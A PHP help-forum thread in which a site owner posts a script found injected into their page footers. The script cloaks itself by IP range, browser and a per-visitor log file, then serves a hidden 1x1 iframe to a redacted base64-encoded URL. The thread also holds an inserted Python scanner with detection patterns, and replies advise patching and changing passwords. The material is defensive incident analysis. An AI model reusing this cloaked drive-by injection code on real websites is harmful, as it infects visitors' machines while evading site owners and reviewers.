
PHP Server Side Scripting Forum

Site Compromised. Need Help Understanding This Script
Dead_Elvis
msg:4280295
5:24 pm on Mar 11, 2011 (gmt 0)

Hi,

I don't know if this is the correct forum for this or not, so please excuse me if I'm not in the correct place.

This morning I kind of accidentally discovered that my site had been compromised. What I found was this script being loaded in the footer of my pages.

I don't know enough about the code used to understand what it does... would anyone like to help me figure it out?

Thanks in advance!

<?
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}

function net()
{
$ip=$_SERVER['REMOTE_ADDR'];

if(
net_match('64.***.160.0/19',$ip)==0 &&
net_match('66.***.0.0/20',$ip)==0 &&
net_match('66.***.64.0/19',$ip)==0 &&
net_match('72.***.192.0/18',$ip)==0 &&
net_match('74.***.0.0/16',$ip)==0 &&
net_match('89.***.224.0/24',$ip)==0 &&
net_match('193.***.125.0/24',$ip)==0 &&
net_match('194.***.194.0/24',$ip)==0 &&
net_match('209.***.128.0/17',$ip)==0 &&
net_match('216.***.32.0/19',$ip)==0 &&
net_match('128.***.0.0/16',$ip)==0 &&
net_match('67.***.0.0/16',$ip)==0 &&
net_match('188.***.0.0/16',$ip)==0
)
return true;
}

function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}detect_os();


function detect_brows() {
global $OOOOO0000, $OOOOOO000;
$user_agent = $_SERVER["HTTP_USER_AGENT"];
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
) $OOOOOO000 = "MSIE";
}detect_brows();

$IP = "{$_SERVER[REMOTE_ADDR]}.log";

function _log()
{ global $IP;
touch ("/tmp/freshnews/{$IP}");
}

function _check()
{
global $IP;
if(!file_exists("/tmp/freshnews/{$IP}")) return true;
}
$sfkg=base64_decode('[alphanumeric string]');
if(_check())
{
if(net())
{
if($os)
{
if($OOOOOO000 == "MSIE")
{
echo 'document.write(\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\');';

_log();

}}}}

[edited by: tedster at 7:33 pm (utc) on Mar 12, 2011]
[edit reason] obscure specifics [/edit]
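Added example, not code from the thread or its poster: a small Python scanner that looks for the fingerprints the footer script above leaves behind (the 1x1 iframe written from a base64-decoded URL, the /tmp/freshnews per-IP marker, the MSIE 6/7/8 user-agent gate, the net_match CIDR cloaking and the O/0-obfuscated globals), so the same injection can be found in other files on the server. Because the script fires only once per visitor IP, only for Windows IE users, and never for the listed address ranges, simply reloading the page rarely reveals it; a file scan is more reliable. The indicator names, the two-hit threshold and the sample inputs are assumptions constructed for this example.

```python
import re
from pathlib import Path

# Indicator patterns drawn from the injected footer script in the post above.
# The last pattern catches the O/0 obfuscated globals ($OOOOO0000, $OOOOOO000).
INDICATORS = [
    ("hidden_iframe", re.compile(r"<iframe[^>]*width=1\s+height=1", re.I)),
    ("base64_payload", re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{16,}['\"]\s*\)")),
    ("tmp_marker_dir", re.compile(r"/tmp/freshnews/")),
    ("ua_msie_gate", re.compile(r"preg_match\s*\(\s*[\"']/MSIE\s+[678]\.0/")),
    ("cidr_cloaking", re.compile(r"net_match\s*\(")),
    ("obfuscated_global", re.compile(r"\$[O0]{8,}\b")),
]

def scan_text(text):
    """Return the names of every indicator that matches the given PHP source."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def is_suspicious(text, threshold=2):
    """Flag a file when at least `threshold` distinct indicators hit; a lone hit
    (e.g. a legitimate 1x1 tracking iframe) is reported but not flagged."""
    return len(scan_text(text)) >= threshold

def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Walk `root` and map each file with at least one hit to its indicator names."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in exts and path.is_file():
            found = scan_text(path.read_text(errors="ignore"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample shaped like the injected script; the redacted URL is the
# base64 of the literal text "PLACEHOLDER_URL" and the IP range is a documentation range.
SAMPLE_INJECTED = """<?
function net_match ( $network , $ip ) { return 0; }
function net() { if(net_match('192.0.2.0/24',$_SERVER['REMOTE_ADDR'])==0) return true; }
global $OOOOO0000, $OOOOOO000;
if (preg_match("/MSIE 6.0/", $ua)) $OOOOOO000 = "MSIE";
if(!file_exists("/tmp/freshnews/{$IP}")) return true;
$sfkg=base64_decode('UExBQ0VIT0xERVJfVVJM');
echo 'document.write(\\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\\');';
"""

# Constructed benign footer: a 1x1 iframe on its own must not be flagged.
SAMPLE_BENIGN = '<iframe src="https://example.invalid/px" width=1 height=1></iframe>'

if __name__ == "__main__":
    print(scan_text(SAMPLE_INJECTED), is_suspicious(SAMPLE_BENIGN))
```

Run `scan_tree("/path/to/webroot")` to list every matching file with its indicator names; files with two or more hits deserve a manual look first.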

topr8
msg:4280305
5:47 pm on Mar 11, 2011 (gmt 0)

It doesn't matter what it does; you've got to patch the hole in your security.

... at a glance it serves an iframe, doubtless with a dubious source, to Internet Explorer users who are not from the IP ranges shown.

Dead_Elvis
msg:4280308
5:52 pm on Mar 11, 2011 (gmt 0)

Thanks topr8,

Yes, I am in the process of finding and patching the hole. They seem to have accessed the site via FTP.

It seemed like knowing what the script does would help me find any other compromised files, directories, etc.

Thanks again.

jimbeetle
msg:4280316
6:06 pm on Mar 11, 2011 (gmt 0)

> They seem to have accessed the site via FTP

Then be sure to check your local machine for a keylogger, scrub it good if one is found, then change all your passwords.
